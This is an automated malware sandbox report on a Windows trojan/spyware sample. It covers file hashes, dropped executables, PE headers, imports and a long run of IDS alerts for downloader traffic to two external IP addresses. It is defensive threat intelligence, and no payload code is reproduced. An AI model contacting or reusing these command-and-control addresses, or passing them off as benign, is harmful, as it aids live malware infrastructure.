                                                      Sample name:XgijTrY6No.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:02e18916d32cb641ad472bf835fa86d6a62b8e86f8838f062fd46cb4b88ccced.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@22/3@51/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 70
                                                      • Number of non-executed functions: 72
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                      • Not all processes were analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: XgijTrY6No.exe
                                                      Time | Type | Description
                                                      10:23:47 | API Interceptor | 629286x Sleep call for process: rundll32.exe modified
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):2175
                                                      Entropy (8bit):4.345606928537238
                                                      Encrypted:false
                                                      SSDEEP:24:8DHNxDLOY1Jan3LzVzao6jzonQlxMnHODiOSGLdjMrGg6Wz7mUzHt0N3Cdkg4Cn0:53tOYQUVnz7zHtJkGTo
                                                      MD5:4F8457524B04E8E471135A01335692C8
                                                      SHA1:EE293ADFDDFB8F2900EA4878CAB7F457C9BB00E1
                                                      SHA-256:0EC2450D39F77FE563889014E82AB4B6F5ACD0AA81CA4BC23B4913ADFCEBE2D3
                                                      SHA-512:6C462501059F334FEE871AD47585E11A945DFAF5E920DFDC44E5C373B9C3CD3250B165E067195A35EEB3EED24FAA854CBF0049F604B018F804E63A4DF752C108
                                                      Malicious:false
                                                      Preview:..2024-12-11 13:50..iOffset....2024-12-11 16:06..iOffset....2024-12-11 19:29..iOffset....2024-12-11 20:56..iOffset....2024-12-11 23:17..iOffset....2024-12-12 02:51..iOffset....2024-12-12 04:33..iOffset....2024-12-12 09:27..iOffset....2024-12-12 13:16..iOffset....2024-12-12 17:00..iOffset....2024-12-12 20:48..iOffset....2024-12-12 23:15..iOffset....2024-12-13 04:15..iOffset....2024-12-13 06:24..iOffset....2024-12-13 11:25..iOffset....2024-12-13 16:52..iOffset....2024-12-13 20:15..iOffset....2024-12-14 04:14..iOffset....2024-12-14 07:50..iOffset....2024-12-14 18:15..iOffset....2024-12-15 00:54..iOffset....2024-12-15 17:11..iOffset....2024-12-16 02:10..iOffset....2024-12-18 16:56..iOffset....2024-12-19 14:44..iOffset....2024-12-20 01:18..iOffset....2024-12-20 22:11..iOffset....2025-05-26 23:47..iOffset....2025-07-27 08:08..iOffset....2025-08-13 13:44..iOffset....2025-09-24 09:00..iOffset....2025-11-09 03:42..iOffset....2025-12-15 17:35..iOffset....2025-12-31 13:18..iOffset....2026-01-26 2
                                                      Process:C:\Users\user\Desktop\XgijTrY6No.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Category:dropped
                                                      Size (bytes):87764
                                                      Entropy (8bit):6.839765003056181
                                                      Encrypted:false
                                                      SSDEEP:1536:8gDktLw4rO10tMrlk3SJDlf98jqP+8il3CxOeZIckWlmypQ:uLRrO10TiJD9yjqrilyxOuPpQ
                                                      MD5:847CCE07E3BF3D974D1D089F5028E95F
                                                      SHA1:AD360C293D76F4566445B971E219E3BC5A51AB2D
                                                      SHA-256:C8BE6A496ACED8BC88340EBB357327701E6A9777821A3F1C5ABE3A9C5880170A
                                                      SHA-512:C2A40CD3E2C081F1F23956CE58185F65E203A31A07AB3A48509161E7540E9E1E3030D3F8FFC55B80C1A96654A74CAF2DF7A2B5AA5502BA1F3BC467E070392F6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Process:C:\Users\user\AppData\Local\Temp\mszcy.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                      Category:dropped
                                                      Size (bytes):45576
                                                      Entropy (8bit):7.865404631369311
                                                      Encrypted:false
                                                      SSDEEP:768:DICzePjle2367kjhrXLdCuYMW8QVnwrLDGe/brbtJyOTuXfADVjeJ2i/MVJWAE:DDePjA23Ukjh37YMonwrvGybrbbRCf4E
                                                      MD5:0F12A7D509B2C9BB9B4CD6D8A0325E86
                                                      SHA1:F5FB59AD4F0633D115B06F35A2DC161DC4367157
                                                      SHA-256:9111C1EB1F0B59DCD49CFD5A0ABC0BA100AC59A3BCAE8623FF091DFDC46FED3C
                                                      SHA-512:E3C84A643FF0A2627DABA8A056221985A472AAF07BADE61B3E9459DB4BFC8792C1347606911E3FCC01581508004B18B5435BCCCD5E7617CC6D091F37A5F42E7F
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit):6.834600080669012
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:XgijTrY6No.exe
                                                      File size:87'284 bytes
                                                      MD5:fc2914434d6121f5e04e8e70e235c239
                                                      SHA1:2cb4237f4c0db11c3b6d80b54c9148daeccfeed6
                                                      SHA256:02e18916d32cb641ad472bf835fa86d6a62b8e86f8838f062fd46cb4b88ccced
                                                      SHA512:27322da544de7d7d1d676edc5dd8dadbdf3e8af0936e6a99b307abc1990df00ec3ae18ef63625929b2935abe3dbb75f51782c5e6fc2b47f894a0ae820065a8f4
                                                      SSDEEP:1536:8gDktLw4rO10tMrlk3SJDlf98jqP+8il3CxOeZIckWlmypV:uLRrO10TiJD9yjqrilyxOuPpV
                                                      TLSH:2983BE5DBD93886ED0018B3547578725E6B2AC19F9314F334350FA1DAF3690BEED9288
                                                      Icon Hash:f0bb9b9b9b9bfe7d
                                                      Entrypoint:0x402f22
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics:
                                                      Time Stamp:0x55F8F97E [Wed Sep 16 05:09:18 2015 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:7149be53ab0cc890706cc958454a7873
                                                      Instruction
                                                      push ebp
                                                      mov ebp, esp
                                                      push FFFFFFFFh
                                                      push 00404AD8h
                                                      push 00402F10h
                                                      mov eax, dword ptr fs:[00000000h]
                                                      push eax
                                                      mov dword ptr fs:[00000000h], esp
                                                      sub esp, 68h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      mov dword ptr [ebp-18h], esp
                                                      xor ebx, ebx
                                                      mov dword ptr [ebp-04h], ebx
                                                      push 00000002h
                                                      call dword ptr [00404268h]
                                                      pop ecx
                                                      or dword ptr [004066A8h], FFFFFFFFh
                                                      or dword ptr [004066ACh], FFFFFFFFh
                                                      call dword ptr [0040426Ch]
                                                      mov ecx, dword ptr [0040669Ch]
                                                      mov dword ptr [eax], ecx
                                                      call dword ptr [00404270h]
                                                      mov ecx, dword ptr [00406698h]
                                                      mov dword ptr [eax], ecx
                                                      mov eax, dword ptr [00404274h]
                                                      mov eax, dword ptr [eax]
                                                      mov dword ptr [004066A4h], eax
                                                      call 00007F5C28BDF188h
                                                      cmp dword ptr [00406590h], ebx
                                                      jne 00007F5C28BE0FDEh
                                                      push 004030A4h
                                                      call dword ptr [00404278h]
                                                      pop ecx
                                                      call 00007F5C28BE10BDh
                                                      push 00406020h
                                                      push 0040601Ch
                                                      call 00007F5C28BE10A8h
                                                      mov eax, dword ptr [00406694h]
                                                      mov dword ptr [ebp-6Ch], eax
                                                      lea eax, dword ptr [ebp-6Ch]
                                                      push eax
                                                      push dword ptr [00406690h]
                                                      lea eax, dword ptr [ebp-64h]
                                                      push eax
                                                      lea eax, dword ptr [ebp-70h]
                                                      push eax
                                                      lea eax, dword ptr [ebp-60h]
                                                      push eax
                                                      call dword ptr [00404280h]
                                                      push 00406018h
                                                      push 00406000h
                                                      call 00007F5C28BE1075h
                                                      Programming Language:
                                                      • [ C ] VS98 (6.0) build 8168
                                                      • [LNK] VS98 (6.0) imp/exp build 8168
                                                      • [C++] VS98 (6.0) build 8168
                                                      • [RES] VS98 (6.0) cvtres build 1720
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4d48 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7000 | 0xc8e4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14fb0 | 0x8 | .CG
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3000 | 0x2400 | e5604bb5c441332166d846e4e0c49c2b | False | 0.560546875 | COM executable for DOS | 6.036937988019541 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4000 | 0x2000 | 0x1600 | fd41b19e9ec06f7b66492dc4ca23e649 | False | 0.34410511363636365 | data | 4.8504121264257725 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6000 | 0x1000 | 0x600 | 3e4e842fedc9d2e7fe48ac505a51b4a8 | False | 0.2890625 | data | 2.9847726844923748 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x7000 | 0xd000 | 0xc800 | cfaa119fa35a42ffce5c8d54d2130533 | False | 0.87822265625 | data | 7.677730986482495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.CG | 0x14000 | 0x2000 | 0x1c00 | 769d77fbde7bb91d8e3ab6c16f4b01f1 | False | 0.5341796875 | data | 5.783383892628231 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.adata | 0x16000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
IMAGE | 0x748c | 0xb208 | data | Chinese | China | 0.9606591188344743
RT_CURSOR | 0x12694 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x127c8 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x128fc | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x12a30 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x12b64 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x12c98 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x12dcc | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_ICON | 0x15714 | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 768 | | | 0.40022935779816515
RT_ICON | 0x153ac | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 768 | | | 0.4025229357798165
RT_GROUP_CURSOR | 0x135d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x135e4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x135f8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x1360c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x13620 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x13634 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x13648 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x15398 | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0x15384 | 0x14 | data | | | 1.1
RT_VERSION | 0x15124 | 0x260 | data | English | United States | 0.5723684210526315
DLL | Import
MFC42.DLL |
MSVCRT.dll | __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, _onexit, __dllonexit, strncpy, sprintf, strcpy, _ftol, _except_handler3, memset, memcpy, srand, rand, _setmbcp, __CxxFrameHandler, _EH_prolog, __p___argv, _controlfp
KERNEL32.dll | CreateFileA, ExitProcess, WinExec, WriteFile, GetTempPathA, Sleep, LockResource, SizeofResource, LoadResource, CreateProcessA, GetModuleFileNameA, ReadFile, FindResourceA, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, GetSystemTime, CreateThread, TerminateThread, GetModuleHandleA, GetStartupInfoA, DeleteFileA, CreateDirectoryA, CloseHandle, GetTickCount
USER32.dll | DrawIcon, GetClientRect, GetSystemMetrics, IsIconic, GetSystemMenu, wsprintfA, EnableWindow, SendMessageA, LoadIconA, AppendMenuA
GDI32.dll | CreateSolidBrush, DeleteObject
WS2_32.dll | setsockopt, WSAIoctl, htons, gethostbyname, gethostname, socket, inet_ntoa, ntohl, ntohs, WSACleanup, WSAStartup, closesocket, recv, WSAGetLastError, bind
Language of compilation system | Country where language is spoken | Map
Chinese | China |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                      2024-12-11T16:25:25.398283+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953096107.163.241.20412354TCP
                                                      2024-12-11T16:25:25.488125+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953196107.163.241.20412354TCP
                                                      2024-12-11T16:25:27.142945+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955373107.163.241.20412354TCP
                                                      2024-12-11T16:25:27.143418+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955196107.163.241.20412354TCP
                                                      2024-12-11T16:25:28.958074+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956944202.108.0.5280TCP
                                                      2024-12-11T16:25:29.394582+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956825107.163.241.20412354TCP
                                                      2024-12-11T16:25:29.502142+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956943107.163.241.20412354TCP
                                                      2024-12-11T16:25:31.158000+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958262107.163.241.20412354TCP
                                                      2024-12-11T16:25:31.158120+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958391107.163.241.20412354TCP
                                                      2024-12-11T16:25:32.986227+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.960100202.108.0.5280TCP
                                                      2024-12-11T16:25:33.409008+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959886107.163.241.20412354TCP
                                                      2024-12-11T16:25:33.582161+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960187107.163.241.20412354TCP
                                                      2024-12-11T16:25:35.161257+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962140107.163.241.20412354TCP
                                                      2024-12-11T16:25:35.161334+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962324107.163.241.20412354TCP
                                                      2024-12-11T16:25:36.966819+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.963952202.108.0.5280TCP
                                                      2024-12-11T16:25:37.393782+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.963850107.163.241.20412354TCP
                                                      2024-12-11T16:25:37.527730+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.963953107.163.241.20412354TCP
                                                      2024-12-11T16:25:39.174337+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950337202.108.0.5280TCP
                                                      2024-12-11T16:25:39.174379+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949568107.163.241.20412354TCP
                                                      2024-12-11T16:25:39.174382+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949408107.163.241.20412354TCP
                                                      2024-12-11T16:25:40.982007+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950977202.108.0.5280TCP
                                                      2024-12-11T16:25:41.422540+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950887107.163.241.20412354TCP
                                                      2024-12-11T16:25:41.516828+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950978107.163.241.20412354TCP
                                                      2024-12-11T16:25:43.390201+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.953380202.108.0.5280TCP
                                                      2024-12-11T16:25:43.390315+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952262107.163.241.20412354TCP
                                                      2024-12-11T16:25:43.390350+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952324107.163.241.20412354TCP
                                                      2024-12-11T16:25:45.263834+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.953422202.108.0.5280TCP
                                                      2024-12-11T16:25:45.704668+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953384107.163.241.20412354TCP
                                                      2024-12-11T16:25:45.820890+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953421107.163.241.20412354TCP
                                                      2024-12-11T16:25:47.489520+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955526107.163.241.20412354TCP
                                                      2024-12-11T16:25:47.489539+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.955962202.108.0.5280TCP
                                                      2024-12-11T16:25:47.489568+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955505107.163.241.20412354TCP
                                                      2024-12-11T16:25:49.296299+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956327202.108.0.5280TCP
                                                      2024-12-11T16:25:49.735788+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956247107.163.241.20412354TCP
                                                      2024-12-11T16:25:49.845073+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956326107.163.241.20412354TCP
                                                      2024-12-11T16:25:51.501863+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958061107.163.241.20412354TCP
                                                      2024-12-11T16:25:51.501893+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.958828202.108.0.5280TCP
                                                      2024-12-11T16:25:51.501922+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.957951107.163.241.20412354TCP
                                                      2024-12-11T16:25:53.311911+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.959066202.108.0.5280TCP
                                                      2024-12-11T16:25:53.740745+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958996107.163.241.20412354TCP
                                                      2024-12-11T16:25:53.848769+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959064107.163.241.20412354TCP
                                                      2024-12-11T16:25:55.520324+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960767107.163.241.20412354TCP
                                                      2024-12-11T16:25:55.520327+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960826107.163.241.20412354TCP
                                                      2024-12-11T16:25:57.315350+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.962750202.108.0.5280TCP
                                                      2024-12-11T16:25:57.751798+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962599107.163.241.20412354TCP
                                                      2024-12-11T16:25:57.861170+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962749107.163.241.20412354TCP
                                                      2024-12-11T16:25:59.533787+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964837107.163.241.20412354TCP
                                                      2024-12-11T16:25:59.533787+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949590202.108.0.5280TCP
                                                      2024-12-11T16:25:59.533794+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964938107.163.241.20412354TCP
                                                      2024-12-11T16:26:01.342570+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949927202.108.0.5280TCP
                                                      2024-12-11T16:26:01.783128+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949903107.163.241.20412354TCP
                                                      2024-12-11T16:26:01.892106+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949928107.163.241.20412354TCP
                                                      2024-12-11T16:26:03.552117+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950952107.163.241.20412354TCP
                                                      2024-12-11T16:26:03.552519+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950770107.163.241.20412354TCP
                                                      2024-12-11T16:26:05.328584+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.952124202.108.0.5280TCP
                                                      2024-12-11T16:26:05.782889+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952076107.163.241.20412354TCP
                                                      2024-12-11T16:26:05.892252+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952148107.163.241.20412354TCP
                                                      2024-12-11T16:26:07.564951+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956006202.108.0.5280TCP
                                                      2024-12-11T16:26:07.564993+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.954341107.163.241.20412354TCP
                                                      2024-12-11T16:26:07.564997+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.954178107.163.241.20412354TCP
                                                      2024-12-11T16:26:09.404639+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956383202.108.0.5280TCP
                                                      2024-12-11T16:26:09.815489+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956340107.163.241.20412354TCP
                                                      2024-12-11T16:26:09.944582+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956384107.163.241.20412354TCP
                                                      2024-12-11T16:26:11.581670+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.958881202.108.0.5280TCP
                                                      2024-12-11T16:26:11.581694+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958350107.163.241.20412354TCP
                                                      2024-12-11T16:26:11.581720+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958345107.163.241.20412354TCP
                                                      2024-12-11T16:26:13.392656+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.959214202.108.0.5280TCP
                                                      2024-12-11T16:26:13.814424+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959128107.163.241.20412354TCP
                                                      2024-12-11T16:26:13.922594+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959213107.163.241.20412354TCP
                                                      2024-12-11T16:26:15.714568+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960550107.163.241.20412354TCP
                                                      2024-12-11T16:26:15.714727+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960645107.163.241.20412354TCP
                                                      2024-12-11T16:26:17.516942+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.961877202.108.0.5280TCP
                                                      2024-12-11T16:26:17.954784+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.961837107.163.241.20412354TCP
                                                      2024-12-11T16:26:18.175392+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.961878107.163.241.20412354TCP
                                                      2024-12-11T16:26:19.721041+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.965375202.108.0.5280TCP
                                                      2024-12-11T16:26:19.721076+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.963928107.163.241.20412354TCP
                                                      2024-12-11T16:26:19.721104+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.963820107.163.241.20412354TCP
                                                      2024-12-11T16:26:21.523696+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949288202.108.0.5280TCP
                                                      2024-12-11T16:26:21.956590+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949227107.163.241.20412354TCP
                                                      2024-12-11T16:26:22.064152+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949286107.163.241.20412354TCP
                                                      2024-12-11T16:26:23.736151+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951231107.163.241.20412354TCP
                                                      2024-12-11T16:26:23.736160+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.952401202.108.0.5280TCP
                                                      2024-12-11T16:26:23.736202+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951179107.163.241.20412354TCP
                                                      2024-12-11T16:26:25.525697+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.952941202.108.0.5280TCP
                                                      2024-12-11T16:26:25.970593+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952745107.163.241.20412354TCP
                                                      2024-12-11T16:26:26.078215+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952943107.163.241.20412354TCP
                                                      2024-12-11T16:26:27.751723+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.955715202.108.0.5280TCP
                                                      2024-12-11T16:26:27.751848+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955105107.163.241.20412354TCP
                                                      2024-12-11T16:26:27.751865+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955099107.163.241.20412354TCP
                                                      2024-12-11T16:26:29.551664+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956267202.108.0.5280TCP
                                                      2024-12-11T16:26:30.003505+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956148107.163.241.20412354TCP
                                                      2024-12-11T16:26:30.095486+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956266107.163.241.20412354TCP
                                                      2024-12-11T16:26:32.005887+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.957654107.163.241.20412354TCP
                                                      2024-12-11T16:26:32.006116+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.957522107.163.241.20412354TCP
